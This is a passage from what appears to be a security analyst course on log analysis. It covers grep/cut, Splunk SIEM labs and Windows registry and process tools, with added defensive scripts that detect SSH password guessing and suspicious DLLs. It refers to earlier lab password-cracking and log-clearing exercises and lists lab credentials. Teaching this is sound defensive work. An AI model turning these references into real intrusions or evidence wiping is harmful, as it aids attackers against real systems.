• Create a delimiter with cut so that it returns more accurate results.
• Use diff to examine the ways two logs diverge in content.
• Use piping to run multiple commands together.
• Use Bash shell scripts to automate entering these commands.

Use Windows-Based Log Analysis Tools

Follow these guidelines when analyzing logs on a Windows system or analyzing logs from a Windows system:
• Ensure that you know the format of common Windows logs, like the Security event log.
• Use findstr when you need to search for specific strings in a log file, like a particular source or event ID.
• Consider the different options available for findstr, like ignoring case sensitivity and searching for discrete words.
• Use WMIC and the NTEVENT alias to pull logs from a remote computer.
• Use Event Viewer's graphical interface to filter logs and create custom views for you to monitor.
• Use Windows PowerShell scripts to automate the task of retrieving log file information.



ACTIVITY 8-1
Analyzing Linux Logs for Security Intelligence

Before You Begin

e
You'll be working in your Kali Linux virtual machine (VM).

ut
Activity: Analyzing Linux
Logs for Security Scenario
Intelligence
In order to examine your organization's Linux logs, you decide to use both the grep and cut

ib
commands to find specific information and make that information more readable. This will make
your log analysis efforts more efficient.

tr
Verify the logs in your Linux log folder.

is
1.
a) On your Kali Linux VM, open a terminal.

D
Consider pointing out b) Enter cd /var/log
the location of log files This is the primary log folder for Linux.
varies from distribution c) Enter ls
to distribution.

2.
of these logs. or
Note the variety of logs in this folder. You can use the commands in this activity to search any or all

Use grep to search within the Linux syslog.


a) At the terminal, enter man grep and note the options available with the grep command.
This is an extremely useful tool for searching any file, not just logs.
b) Scroll through the grep manual until you return to a prompt.

Note: You can also press q to return to a prompt.


c) Enter sudo grep "root" syslog

This shows all instances of the word "root" in the syslog file. You can search for any text string in
any file this way.

Note: These searches are case sensitive by default.

Note: If there is no syslog file in /var/log, the system is logging only to the systemd journal (recent
Kali releases do not install rsyslog by default); either install rsyslog or read the journal with
journalctl instead.

d) Enter sudo grep "root" syslog*


The asterisk ( * ) is a wildcard character, so this command searches for the word "root" in all files
that start with "syslog" (syslog, syslog.1, syslog.2.gz, etc.).
e) Enter sudo grep -i "error" syslog*

The -i flag makes the search case insensitive.

Note: Rotated logs that have already been compressed (syslog.2.gz and later) are not searched
meaningfully by grep; use zgrep with the same options to search inside them.

3. How would you use grep to look for a negative match for a pattern rather than
a positive match?
A: The -v flag does a negative match.

4. Use cut to make your syslog entries more readable.

a) At the terminal, enter sudo cut -c1-15 syslog

This command displays the first 15 characters of each log item in the file. In the traditional syslog
format (for example, Mar 10 14:02:11) that is exactly the date and time of each log item; on a system
that logs high-precision ISO 8601 timestamps the width will differ.
b) Enter sudo cut -c16-35 syslog

This command displays characters 16 to 35, which generally include the source of each log item
(e.g., the kali host), as well as the process/application that made the log entry. Of course, the
length of each field affects what gets printed, so you'll want to use a more elegant way to retrieve the
desired information.


c) Enter sudo cut -d ":" -f1-3 syslog

The -f flag selects which fields to display. In this case, the first three fields are displayed. The -d
flag enables you to specify what separates (delimits) each field. In this case, the fields are separated
by a colon, which produces the date, time, source, and process/application (everything up to the
third colon, because the time itself contains two colons).

5. What other useful delimiters are there?

A: Answers will vary, but major delimiters include space, tab, period, and comma.

6. Combine grep and cut.


a) Enter sudo grep -i "error" syslog* | cut -d " " -f1-5

Instructor note: Ensure that students are placing a space between the quotes in this command. If no
error events are found, consider having students use terms like "warning" or "critical" instead.

You can use the pipe (|) character to link Linux commands together. This command shows the first
five fields, delimited by spaces, of the syslog entries that include the word "error" (case insensitive).

Note: When grep searches more than one file, as syslog* does here, it prefixes each match with the
file name and a colon, so the first space-delimited field reads syslog.1:Mar rather than Mar. Add -h
to grep to suppress the prefix.

7. The syslog.1 file is the most recently rotated copy of syslog (with daily rotation, yesterday's log
file). How would you identify warnings in this log?
A: Answers may vary, but it would be something like sudo grep -i "warning" syslog.1 | cut -d ":" -f1-3

Instructor note: Kali Linux may not have produced yesterday's log file for students to test this
command. The same command could be executed on the main log file, however.
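The grep and cut pipeline from this activity, carried further in an added shell example that is not part of the course or its lab files: it writes a small constructed syslog sample to a temporary file, applies the same grep/cut steps with -i and -v, and then turns the output into a detection, counting failed SSH logins per source address and flagging sources whose failures were followed by a successful login (the pattern an online password-guessing attack leaves behind). The log lines, the host name kali, the addresses 10.39.5.7 and 192.0.2.44, and the threshold of 3 failures are all constructed for the example.

```shell
#!/bin/sh
# Constructed sample of traditional-format syslog lines (not a real capture).
SYSLOG_FILE=$(mktemp)
trap 'rm -f "$SYSLOG_FILE"' EXIT
cat > "$SYSLOG_FILE" <<'EOF'
Mar 10 14:02:11 kali sshd[1181]: Failed password for root from 10.39.5.7 port 51234 ssh2
Mar 10 14:02:13 kali sshd[1181]: Failed password for root from 10.39.5.7 port 51236 ssh2
Mar 10 14:02:15 kali sshd[1183]: Failed password for admin from 10.39.5.7 port 51238 ssh2
Mar 10 14:02:16 kali CRON[1190]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Mar 10 14:03:01 kali sshd[1199]: Accepted password for root from 10.39.5.7 port 51240 ssh2
Mar 10 14:05:44 kali sshd[1210]: Failed password for invalid user test from 192.0.2.44 port 40022 ssh2
Mar 10 14:06:02 kali kernel: [ 1234.567890] usb 1-1: USB disconnect, device number 4
EOF

# Timestamp, host and process of every "root" entry, with the CRON noise
# removed by a negative match (-v). Same grep | cut pipeline as the activity.
root_events_excluding_cron() {
    grep "root" "$1" | grep -v "CRON" | cut -d " " -f1-5
}

# Failed SSH logins counted per source address. Field positions shift when the
# message contains "invalid user", so the address is pulled with a regex (-o)
# rather than by a fixed space-delimited field number.
failed_logins_by_source() {
    grep -i "failed password" "$1" \
        | grep -oE 'from [0-9.]+' | cut -d " " -f2 \
        | sort | uniq -c | sort -rn | sed 's/^ *//'
}

# Sources with at least THRESHOLD failures and a later successful login:
# the signature of an online password-guessing attack that worked.
# grep -c exits 1 when the count is 0, hence the "|| true" guards.
brute_force_sources() {
    log="$1"; threshold="$2"
    for ip in $(grep -i "failed password" "$log" | grep -oE 'from [0-9.]+' | cut -d " " -f2 | sort -u); do
        fails=$(grep -ic "failed password.* from $ip " "$log" || true)
        ok=$(grep -ic "accepted password.* from $ip " "$log" || true)
        if [ "$fails" -ge "$threshold" ] && [ "$ok" -gt 0 ]; then
            echo "$ip"
        fi
    done
    return 0
}

echo "== root entries (CRON excluded) =="; root_events_excluding_cron "$SYSLOG_FILE"
echo "== failed SSH logins by source =="; failed_logins_by_source "$SYSLOG_FILE"
echo "== sources with >= 3 failures followed by success =="; brute_force_sources "$SYSLOG_FILE" 3
```

Point the three functions at /var/log/auth.log (or syslog) instead of the temporary file to run them against a real system; the same regex approach works on whichever file sshd writes to on your distribution.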

TOPIC B
Use SIEM Tools for Analysis
SIEM deserves particular mention, as it's one of the most powerful log analysis tools available to
you. A properly configured SIEM can provide you with incredible insight into your security
intelligence.

Security Intelligence Correlation
Taken in combination, events that seem completely valid and proper on their own may reveal a
security problem. For example, your virtual private network (VPN) logs show that Jane Doe, one of
your sales representatives who regularly travels to Asia, has logged in to your network from a
location in Beijing. Moments later, your radio frequency identification (RFID) physical security
logging system shows that Jane has swiped her ID card at the front door of your corporate office in
Rochester, NY. While neither of these events would individually show up as an anomaly, combined
they provide good evidence that you have a security problem.
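The Jane Doe scenario above as detection logic, written here as an added shell example rather than taken from the course: two constructed logs in different formats (a space-delimited VPN login log and a CSV badge-reader export; both formats are assumptions) are correlated with awk on user name and a time window, which is the aggregation and normalization step a SIEM performs before it can raise this kind of alert. The users jdoe, asmith and bchen, the geo= field, the ROC-FRONT door and the 3600-second window are all assumptions made for the example, and it correlates only events that fall on the same calendar day.

```shell
#!/bin/sh
# Constructed sample logs (not real captures). The VPN concentrator writes
# space-delimited key=value lines; the badge system exports CSV.
VPN_LOG=$(mktemp); BADGE_LOG=$(mktemp)
trap 'rm -f "$VPN_LOG" "$BADGE_LOG"' EXIT
cat > "$VPN_LOG" <<'EOF'
2024-03-10 09:00:12 vpn LOGIN user=jdoe src=203.0.113.25 geo=CN
2024-03-10 09:10:40 vpn LOGIN user=asmith src=198.51.100.9 geo=US
2024-03-10 02:15:03 vpn LOGIN user=bchen src=192.0.2.77 geo=JP
EOF
cat > "$BADGE_LOG" <<'EOF'
2024-03-10,09:04:55,SWIPE,jdoe,ROC-FRONT,Rochester-NY
2024-03-10,09:30:02,SWIPE,asmith,ROC-FRONT,Rochester-NY
2024-03-10,16:02:11,SWIPE,bchen,ROC-FRONT,Rochester-NY
EOF

# correlate_vpn_badge VPN_FILE BADGE_FILE WINDOW_SECONDS
# Prints one ALERT line per user who logged in over the VPN from outside the
# US and badged into the office within WINDOW_SECONDS of that login, on the
# same day. The FS=, operand switches awk to comma-separated fields for the
# second file only, which is how the two formats are normalized.
correlate_vpn_badge() {
    awk -v window="$3" '
    # seconds since midnight from an hh:mm:ss string (same-day assumption)
    function secs(t,   h) { split(t, h, ":"); return h[1] * 3600 + h[2] * 60 + h[3] }
    # value of a key=value token in a space-delimited line, "" if absent
    function kv(line, key,   n, tok, i, p) {
        n = split(line, tok, " ")
        for (i = 1; i <= n; i++) { split(tok[i], p, "="); if (p[1] == key) return p[2] }
        return ""
    }
    FNR == NR {                         # first file: VPN log, remember foreign logins
        if ($4 == "LOGIN" && kv($0, "geo") != "US") {
            u = kv($0, "user")
            vpn_day[u] = $1; vpn_sec[u] = secs($2); vpn_geo[u] = kv($0, "geo")
        }
        next
    }
    $3 == "SWIPE" {                     # second file: badge CSV, look for a matching user
        u = $4
        if ((u in vpn_sec) && vpn_day[u] == $1) {
            delta = secs($2) - vpn_sec[u]
            if (delta < 0) delta = -delta
            if (delta <= window)
                printf "ALERT user=%s vpn_geo=%s badge_site=%s delta_s=%d\n", u, vpn_geo[u], $6, delta
        }
    }' "$1" FS=, "$2"
}

correlate_vpn_badge "$VPN_LOG" "$BADGE_LOG" 3600
```

Only jdoe is reported: asmith's VPN login is domestic, and bchen's office swipe comes almost fourteen hours after the login, outside the window. Widening the window to a full day would also flag bchen, which is the tuning decision an analyst makes when turning this rule into a SIEM correlation.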


Security Information and Event Management (SIEM)
Security information and event management (SIEM) solutions provide real-time or near-real-time
analysis of security alerts generated by network hardware and applications. SIEM technology is
often used to provide expanded insights into intrusion detection and prevention through the
aggregation and correlation of security intelligence. SIEM solutions can be implemented as software,
hardware appliances, or outsourced managed services.
SIEM products are excellent tools that can help an organization streamline its network security
administration. Productivity in the areas of log analysis and auditing network systems is likely to
increase, as SIEM solutions will help administrators more easily identify problems that would
otherwise take them a very long time to detect. This is especially crucial in responding to a security
breach where every second counts.
The effective deployment of a SIEM program involves the following considerations:
• The SIEM solution should log all relevant events and not be cluttered with irrelevant data.
• Establish and clearly document the scope of events. This will help you support the previous
bullet point.
• Define exactly what you do and do not consider a threat.
• Have a plan about what should be done in the event that you are alerted to a threat.
• Establish a robust ticketing process to track all flagged events.
• Schedule regular reviews of logs so you don't miss any important events that have escaped alerts.
• Provide auditors and forensic analysts with a trail of evidence to support their duties.

SIEM Analysis
In many cases, intelligence loses value over time. So, the intelligence that you capture and analyze in
real time or near real time would be the most valuable. In some cases, such timely intelligence might
enable you to limit or completely avoid the damage resulting from an attack. But gathering and
analyzing security intelligence takes a lot of effort. Many tedious tasks are involved in the process:
identifying relevant data, collecting it, transforming it into a useful form, aggregating different
sources and correlating them, analyzing the correlated data to find patterns that are significant for
security, and finally identifying actions you should take in response to those significant security
patterns. SIEMs are intended to automate much of the process of gathering and analyzing security
intelligence, improving its timeliness.

Figure 8-10: SIEM's presence in the security intelligence lifecycle.

As shown here, SIEMs can be configured to automate much of the security intelligence lifecycle,
predominantly in the collection and processing phases. SIEMs can even automate some of the tasks
involved in analysis, production, and dissemination. Of course, a lot of planning and configuring is
required to enable a SIEM to accomplish these tasks. SIEMs can help with some of the planning
and direction phase by providing templates, discovery features, and other functions. Even though a
SIEM can automate numerous tasks, there are still significant gaps that require human intervention,
including dissemination and integration, planning and direction tasks, and of course, analysis.
To some extent, some of your analysis work can be reduced through careful planning and direction
on the front end of the lifecycle. For example, in the process of evaluating what information you
will collect to meet your security and compliance requirements, you are conducting a front-end
analysis. This process will save you (and the SIEM) significant work later on. While a SIEM could
conceivably collect all the logs across your systems, this is not a good idea. It is best to configure the
SIEM to focus on the events related to security and compliance that you need to know about, which
you have already identified through your risk management analysis. Too much information can bog
down the work performed by the SIEM, create unnecessary network traffic, and create more work
for you when it's time to analyze information produced by the SIEM. All of these can affect the
timeliness of the security intelligence that you produce.


SIEM Tools
Common SIEM tools include:
• Splunk®: A proprietary SIEM (Splunk was acquired by Cisco in 2024) that has a limited free
version for individuals, a paid enterprise version, and a paid cloud-based version.
• ArcSight Enterprise Security Manager (ESM): A proprietary SIEM maintained by Micro
Focus (now part of OpenText) and previously the property of Hewlett-Packard (HP).
• IBM® Security QRadar®: A proprietary SIEM.


• Open Source Security Information Management (OSSIM): An open source SIEM
developed by AlienVault® that is delivered as its own operating system, rather than as an
independent application.

SIEMs and AI
Modern SIEM systems incorporate artificial intelligence (AI) and machine learning capabilities that
enhance collection and correlation activities. For example, the SIEM might be able to train a
machine learning model that is able to intelligently classify useful and relevant data while also
identifying data that is not worth collecting. Likewise, the SIEM may be able to use correlations and
other characteristics of the data to determine when an event requires attention and what the
appropriate response should be.

Agent-Based vs. Agentless SIEMs
SIEMs typically collect data from various hosts in one of the following ways:
• Agent-based: With this approach, you must install an agent service on each host. As events
occur on the host, logging data is filtered, aggregated, and normalized at the host, and then sent
to the SIEM server for analysis and storage. This approach only sends required data to the
server, keeping network traffic to a minimum.
• Agentless: With this approach, you do not have to install and configure an agent service on each
host. The SIEM server periodically has to log in to each host it is monitoring to retrieve log
updates. Because data is not pre-processed by an agent, larger amounts of data (much of it
unnecessary) must be sent across the network to the SIEM server, where it is then filtered,
aggregated, and normalized. Agentless collection also covers sources that push their own records,
such as syslog from network devices. Where the SIEM server must instead authenticate to each
host to pull logs, the collection account is a high-value credential and should be granted only the
read access it needs.

Although they do not provide a complete alternative to skilled (human) security analysts, some
organizations may find that these tools are a valuable addition to their security intelligence collection
toolkits.

Other Applications of Agent-Based and Agentless Data Collection
SIEMs are not the only tools that can rely on agent-based or agentless data collection. For
example, a scanning tool like Nessus collects vulnerability data from devices that you've deployed its
agents to. An asset discovery and management tool like ManageEngine AssetExplorer can use
Windows Management Instrumentation (WMI) to scan devices without having agents installed on
them.

Guidelines for Using SIEMs for Security Intelligence Analysis
Follow these guidelines when using a SIEM for security intelligence analysis.

Support Compliance When Using a SIEM
Follow these guidelines to ensure your use of a SIEM will enable you to conform to compliance
requirements:
• Preserve data as required in its original forms. SIEMs generate new versions of data that may not
satisfy some compliance requirements. Be careful to preserve original logs and other data that
might be required by regulations and standards you must follow.
• To support compliance regulations and help to ensure follow-up, configure the SIEM, if
possible, to generate important alerts in a form such as support tickets, which automatically
document threats you have detected and are following up on.
• Review your logs on a frequent, regular basis.
• Ensure that SIEM monitoring can generate documentation to show your systems are frequently
scanned for threats and that logs and alerts are regularly reviewed by personnel.

Configure a SIEM for Comprehensive Security
SIEMs are most useful when they receive information from a wide variety of sources, which they
can aggregate to reveal better insights than any of those sources can produce alone. Follow these
guidelines when configuring your SIEM:
• Configure your SIEM to aggregate data from many boundary, network, and data defenses, such
as firewalls, intrusion detection, enterprise anti-malware tools, and data loss prevention, where
they can drive reports and alerts, and be correlated with other events to provide improved
security intelligence.
• Configure your SIEM to identify unauthorized assets and software. By using the SIEM to
maintain your inventory of authorized assets and software, you have a reference baseline from
which the SIEM can quickly identify any assets or software that are not on the approved list.
• Use the SIEM to monitor configurations of hardware and software on servers, workstations, and
notebook computers, and provide alerts when a misconfiguration is identified.
• Use the SIEM to monitor configurations of wireless devices and wireless intrusions, and provide
alerts when a misconfiguration is identified.
• Use the SIEM to monitor configurations of rules, policies, access control, and other
configurations on network devices such as firewalls, routers, and switches.
• Configure the SIEM to report on the unnecessary use of administrator privileges, such as a user
with administrative access running a web browser on a server.
• Correlate user activities with user rights and roles to reveal violations of least-privilege
enforcement.
• Integrate the SIEM with your vulnerability scanner so that assessment results are ingested
continuously and remediation can be tracked against the findings.


ACTIVITY 8-2
Incorporating SIEMs into Security Intelligence
Analysis

Before You Begin

You'll be using Splunk, a SIEM tool, which has been installed on your Windows Server.

Scenario

With logs coming in from all over your network, you realize you need the centralized analysis
platform a SIEM can provide. After looking at some of the providers, you decide to test Splunk to
see how well it will operate in your environment. You'll analyze your server's event logs in the wake
of the password attack you launched back in the "Analyzing Attacks on Computing and Network
Environments" lesson.

Instructor note: Ensure students understand that this activity is just a taste of what a SIEM can do.
Leveraging the full power of a SIEM requires more complex configuration that is beyond the scope
of this course.

1. Sign in to Splunk.

a) Open a web browser on your Windows Server and navigate to http://localhost:8000.
b) Verify that you are automatically signed in.


Note: The user name is admin and the password is Pa22w0rd if you need to
sign back in for any reason.

2. Set up Splunk to monitor Windows event logs.

a) In the right pane, select the Add Data button.
b) Scroll down, and under the Or get data in with the following methods section, select Monitor.

c) From the navigation pane on the left, select Local Event Logs.

e
ut
ib
tr
is
D
or
e
at
lic

Note: Notice that you can also monitor local and remote systems.

d) In the right pane, select the add all link next to the Available item(s) list.

e) At the top of the page, select the Next button, then Review, then Submit.
f) Select the Start Searching button.

g) Verify that the search box displays a search query with the source as your Windows event log and
the host as your server's computer name.
h) If necessary, press Enter to run the search query.

3. Run queries to search for Secure Shell (SSH) connections to your server.
a) Remove the search query and type error, and then press Enter.

Note: Splunk is currently monitoring only one source (event log) and host
(your server), so you don't need to include this information in the query.

b) Search for sshd 10.39.5.#, where # is the last octet of your Kali Linux VM's IP address.
c) Verify that there are many entries for attempted SSH connections to the server.

d) Search for sshd password fail* to search for SSH connection attempts that failed.
This searches for any text that includes "sshd", "password", and any text that starts with "fail". So,
both "failed" and "failure" will appear in the results.

Note: Splunk assumes a logical AND between two terms unless otherwise
specified. In this case, Splunk will only return results that include "sshd" and
"password" and "fail*" in a particular event entry. You can also type OR
between each term to specify a logical OR operation.

4. Is there any evidence of the SSH password attack you ran in the "Analyzing
Attacks on Computing and Network Environments" lesson?
A: Yes, Splunk should show many password failures (hundreds) depending on what experimentation
you may have done.


5. Despite the fact that you covered your tracks in the "Analyzing Post-Attack
Techniques" lesson, why do log entries concerning SSH still appear?
A: There are two reasons. The most obvious is that you used SSH after you cleared the Application
log, so any of that activity would be logged. However, there are still SSH logs from the cracking
attempt in the "Analyzing Attacks on Computing and Network Environments" lesson, as mentioned
in the previous question. This is because some SSH activity is also sent to the Security log, which
you likely didn't clear. Remember, you performed online dictionary cracking using Ncrack; it tried
and failed to connect using many different passwords before it successfully connected with the
correct password.

6. How would you look specifically for SSH password failures for the
Administrator account that came from Kali Linux?
A: Answers may vary, but using the search query sshd pass* fail* admin* 10.39.5.# where # is the
last octet of your Kali Linux IP address will work.

7. Refine your search.
a) At the top-left of the page, select the Search tab.
b) Select the Data Summary button to return to the default view of the data.
c) From the Data Summary pop-up, select Hosts, then select your server.
d) For any event listed, select the Show all n lines link to open more information about that event.
e) Select any of the fields that interest you, and then select Add to search.

Notice that you can continue to hone your search with this method.


f) Refine your search some more, or start over and try a fresh search. Try adding OR between your
search terms to see how that changes your output.

Note: Logical operators must be in all caps in Splunk.

g) Enter error OR fail* OR severe as the search query.


This will help you find all errors, even those that happen to use different terminology.

8. What other sources of data would you load into Splunk in the Develetech
network?
A: Answers will vary, but should include firewall logs, intrusion detection system (IDS) logs, web
server logs, and logs from other critical systems.

9. How does a system like this aid security management?
A: Answers will vary, but could include: it pulls all logs into one place for analysis and enables the
massaging of data and reconstruction of events for incidents.

10. Close Splunk.


Summary
In this lesson, you analyzed log data by using a variety of different tools and techniques. You used
common tools available for Windows and Linux to assist in the analysis process, as well as took
advantage of the power of SIEMs. By combining these tools and techniques into a comprehensive
log analysis strategy, you'll be able to extract actionable intelligence out of your logs while
circumventing the noise.

What are some of the tools you use most often to analyze log data?
A: Answers will vary. Students will likely have some familiarity with Linux, and may prefer to use tools like
grep, awk, and cut to aid them in analysis tasks. Others may need to perform analysis of Windows
system logs and will use command-line tools like findstr or GUI tools like Event Viewer. Whatever
they use, students will also likely see the value in scripting the use of these tools for automation; they
can do this through the scripting languages Bash (Unix-like) or Windows PowerShell, among others.

Instructor note: Encourage students to use the social networking tools provided on the CHOICE
Course screen to follow up with their peers after the course is completed for further discussion and
resources to support continued learning.

How could/does a SIEM in your organization or an organization you're familiar
with help increase productivity in the security intelligence lifecycle processes?
A: Answers will vary. SIEMs provide the most support in the intelligence lifecycle in the collection and
processing phases. They can automate the collection of data from disparate sources (e.g., business
application logs from Windows client computers and Linux syslogs from critical servers), as well as
correlate that data so that it becomes more useful for analysis (e.g., normalizing time attributes across
logs with different formats). In some cases, students using SIEMs may be able to speed up their
analysis efforts if they can program their SIEM solution to spot common malicious patterns (e.g.,
repeated failed attempts at remote authentication to multiple critical servers). However, SIEMs are not
a full replacement for human analysis processes. Students may also be able to leverage a SIEM's
ability to disseminate data and integrate that data with other solutions, but again, human intervention
is usually necessary to round out this process.
at

Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.


9 Performing Active Asset and Network Analysis

Lesson Time: 3 hours

Lesson Introduction

The analysis you perform on log data is important, but it tends to remain static. Most of the
intelligence you'll be gathering and analyzing from logs will be actionable only after the event
is either underway or already finished. So, to complement this static analysis, you need
something a bit more dynamic. That's why, in this lesson, you'll take a more active approach
to analyzing your organizational assets.
Lesson Objectives

In this lesson, you will:
• Analyze incidents with Windows-based tools.
• Analyze incidents with Linux-based tools.
• Analyze common indicators of potential compromise.


TOPIC A
Analyze Incidents with Windows-Based Tools
The Windows® architecture is unique among operating systems, and requires certain tools to analyze
every dimension of that architecture. In this topic, you'll use some of the most common of these
tools.

Registry Analysis Tools for Windows
The Windows Registry stores configuration information for low-level Windows processes and
services, as well as any apps that choose to use it. Because low-level elements like the Windows kernel
and device drivers store settings in the Registry, it is a common target for attackers who want to
manipulate components crucial to Windows operating normally. The Registry is also used as a
vector for hiding malicious app settings that aren't easily detected through manual analysis or
automated tools.
The default Registry editor that Windows provides is called regedit, or the Registry Editor. The
Registry Editor provides a File Explorer–like GUI for viewing the structure of the Registry.
Ultimately, at the end of each path in the Registry is a single entry. The format of each entry is as
follows:
• The key, which is similar to a folder or other container structure.
• The value, which is similar to a file in that it holds the data. Keys can have multiple values.
• The value type, which tells Windows how to parse the value's data (such as if the data is in a
string format, a binary format, etc.).
Keys with similar purpose or relevancy are organized into one of several hives. For example, most
third-party software will be grouped into the HKEY_LOCAL_MACHINE\SOFTWARE hive.
The root key of this hive is typically shortened to HKLM, and it also contains the \SYSTEM,
\SECURITY, and \SAM hives. Another hive of note is HKEY_CURRENT_USER, or HKCU,
which contains value data about the currently logged-in user (it is that user's NTUSER.DAT hive
file, loaded at logon).


up
D
ot
N
o
D

Figure 9-1: The Registry Editor.


Analyzing the Registry through regedit can reveal several things. You can search HKLM for
drivers attached to the operating system to identify unknown keys or known malicious ones. You
can also search HKCU for most recently used (MRU) lists, such as the Run dialog history in
\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, to see if the user's recent
activity includes anything malicious. Essentially, comparing known key values to their current
values can help you identify tampering. You should especially watch the keys of processes and
applications like cmd.exe, explorer.exe, Session Manager, System Policy, and others that could
potentially grant a user control over the system. Many values have no data set, but a lack of data in a
value could also indicate it was maliciously removed.

One of the biggest drawbacks to regedit is that it doesn't display the last-write time of a key (the
Registry records this timestamp per key, not per value), even though the information is stored in
the hive. To see it, export the key with File > Export and choose the Text Files (*.txt) format; the
export lists the last write time of each key.

Additional Registry Tools
Some third-party alternatives are available to you should regedit not be what you're looking for.
For example, regdump is a tool that dumps the contents of the Registry in a text file with simple
formatting. This can help you search specific strings in the file with findstr, or, if you're analyzing
from a Linux® machine, you can use grep.
Autoruns, a Microsoft Sysinternals utility, enables you to view every application and process that
starts automatically when Windows is booted. It also provides a link to the Registry keys that
configure autorun functionality for the relevant app or process. If malicious software or some other
unauthorized process boots with Windows, you can use Autoruns to more easily identify the
compromised Registry entries.

File System Analysis Tools for Windows
There are many ways the Windows file system can be used as both a vector and a target for an
attack. Monitoring how the file system changes over time can greatly assist your analysis efforts.
Since most malware resides somewhere within a host's file structure, being able to identify the
malware and assess how it behaves is crucial to removing all traces of the infection.
The standard dir command, which lists all files and folders in a directory, actually has some
advanced functionality for file system analysis. The /A:x switch filters on the file attribute given
as x. For example, dir /AH displays only hidden files and folders. Malicious
files marked as hidden are much easier to find this way than looking through every entry, especially
if the folder contains hundreds or thousands of files. Since PowerShell is now default in Windows,
you should consider using the Get-ChildItem cmdlet and its various arguments instead. In
PowerShell, dir is an alias for Get-ChildItem and the /AH syntax does not apply; the equivalent is
Get-ChildItem -Hidden (or -Force to list hidden and normal items together).
For tools that specifically focus on file system analysis, you should also consider the many drive
usage tools available. These tools will typically scan a file system and retrieve comprehensive
statistics about how that system is operating, including:
• Visual representation of storage space. For example, a tree map can represent a hierarchy of
folders and increase the visual size of folders depending on how much data they hold.
• A directory listing of storage space, with folders and files sortable by size, extension, number of
files, and more.
• The real-time usage of information being written to a drive.
• A list of individual processes and applications and their live read/write speeds of a drive.
Applications and processes that consume too much drive capacity or too much live activity may be
malicious. They might be constantly running in the background, consuming too much of the
computer's storage or CPU, and slowing the computer to a crawl. Drive usage tools include:
• Task Manager
• Resource Monitor
• SpaceSniffer
• WinDirStat
• TreeSize
• DiskSavvy

Figure 9-2: Resource Monitor displaying activity on a disk.

PE Explorer
PE Explorer is proprietary software that offers a variety of different features, including the ability to
browse the structure of 32-bit Windows executable files. The main advantage of this is you can
observe what a program is accessing, like what dynamic-link libraries (DLLs) it calls and how it
interfaces with other applications on the system, as well as how it uses application programming
interfaces (APIs).
Being able to open executables like EXEs can help you determine whether or not the executable is
exhibiting malicious behavior. It also lets you see if any legitimate apps are calling malicious libraries
that could be affecting both the app and the system it runs on.

Process Analysis Tools for Windows: Process Explorer

A process is an instance of a running application, and many default processes in Windows run
quietly in the background. An attacker who is able to hijack these processes can eavesdrop or make
unauthorized changes to a computer depending on the process's access rights. Attackers can also
craft malicious processes to run without the user's knowledge, which can make the task of
identifying related problems much more difficult. Although Task Manager gives the user an
overview of the running processes on the system, as well as the ability to alter those processes, there
are other tools more specialized in this area.

For instance, Microsoft offers the Process Explorer program via a free download as part of its
Sysinternals suite of tools. Process Explorer goes beyond Task Manager and provides many more
features to help you analyze running application code. One feature includes the ability to see all the
system resources a particular process is currently reserving. If you are unable to edit or otherwise
manage a particular file, you can use Process Explorer to identify the potentially malicious process
that is using it. Likewise, Process Explorer can assist you in examining an unknown process by
displaying the DLLs it is using or the Registry entries it is tied to.
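The DLL view that the text describes can also be reproduced from the command line, which helps on a host where you cannot copy Process Explorer. The following PowerShell is an added example (not the course's and not a Sysinternals tool): it lists the modules loaded into a process through Get-Process, checks each DLL's Authenticode signature, and flags unsigned DLLs that were loaded from user-writable folders. The process name and the folder list are assumptions.

```powershell
# Added example, not part of the course or of Sysinternals: a command-line
# approximation of Process Explorer's lower-pane DLL view with a signature check.
# Process name and the list of user-writable folders are assumptions.
function Get-LoadedModuleReport {
    param([Parameter(Mandatory)][string]$ProcessName)

    # Folders a regular user can write to; a DLL loaded from here is unusual for
    # a system process and is the classic DLL side-loading location.
    $userWritable = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:PUBLIC,
                      "$env:USERPROFILE\Downloads")

    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction Stop) {
        # Module lists of protected or higher-integrity processes are not readable;
        # skip those instead of aborting the whole report.
        $modules = @()
        try { $modules = $proc.Modules } catch { }

        foreach ($m in $modules) {
            $sig = Get-AuthenticodeSignature -FilePath $m.FileName -ErrorAction SilentlyContinue
            $status = if ($sig) { $sig.Status } else { 'Unknown' }
            $inUserPath = $false
            foreach ($folder in $userWritable) {
                if ($folder -and $m.FileName -like "$folder\*") { $inUserPath = $true }
            }
            [pscustomobject]@{
                Process    = "$($proc.ProcessName) ($($proc.Id))"
                Module     = $m.ModuleName
                Path       = $m.FileName
                Signature  = $status
                Signer     = $sig.SignerCertificate.Subject
                # Unsigned and loaded from a user-writable folder: review it.
                Suspicious = ($status -ne 'Valid') -and $inUserPath
            }
        }
    }
}

# Run against the process you want to examine (explorer is only a placeholder).
Get-LoadedModuleReport -ProcessName 'explorer' |
    Sort-Object Suspicious, Signature -Descending |
    Format-Table Suspicious, Signature, Module, Path -AutoSize
```

A 32-bit PowerShell session cannot enumerate the modules of 64-bit processes, so run this from the native 64-bit shell, elevated, to see system processes as well.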

Figure 9-3: Process Explorer showing the Registry keys associated with a specific process.

Process Analysis Tools for Windows: Process Monitor

Another tool for process analysis is Process Monitor (Procmon), also offered by Microsoft as part
of Sysinternals. Whereas Process Explorer is better used as an advanced Task Manager, enabling you
to monitor processor and memory consumption in real time, Process Monitor is more suited toward
analyzing how the process interacts with the system by filtering and searching a log of process
activity data. In particular, with Process Monitor you can analyze every operation a process has
undertaken (including Registry key usage), the status of that operation, and any additional input/
output detail of that operation.

You can also analyze each operation's thread stack to find its root cause. For example, if an
application is attempting to access a file that doesn't exist, you can review the stack to see if any of
the modules there seem out of place with regard to what the application should or should not do. A
malicious DLL, for instance, could be interfering with the process's normal execution.

Figure 9-4: Filtering logged process data using Process Monitor.

Command-Line Tools
There are also a few Windows-based command-line tools that offer similar functionality to the
previous GUI tools. An older tool is tlist, which displays process information like its memory
usage, the state of running threads, a process tree, and individual operations for each process. The
tlist tool was replaced by tasklist, which offers most of the same functionality.

Service Analysis Tools for Windows

Although processes can run without any overt sign to the user, Windows services are almost always
designed to run in the background without directly interfering with the current user's desktop
session. This essentially makes services a type of non-interactive process. Malware that installs itself
as a service can effectively hide itself from manual detection, and may even be able to escape the
notice of traditional anti-malware scanners. There are some tools that can help you identify
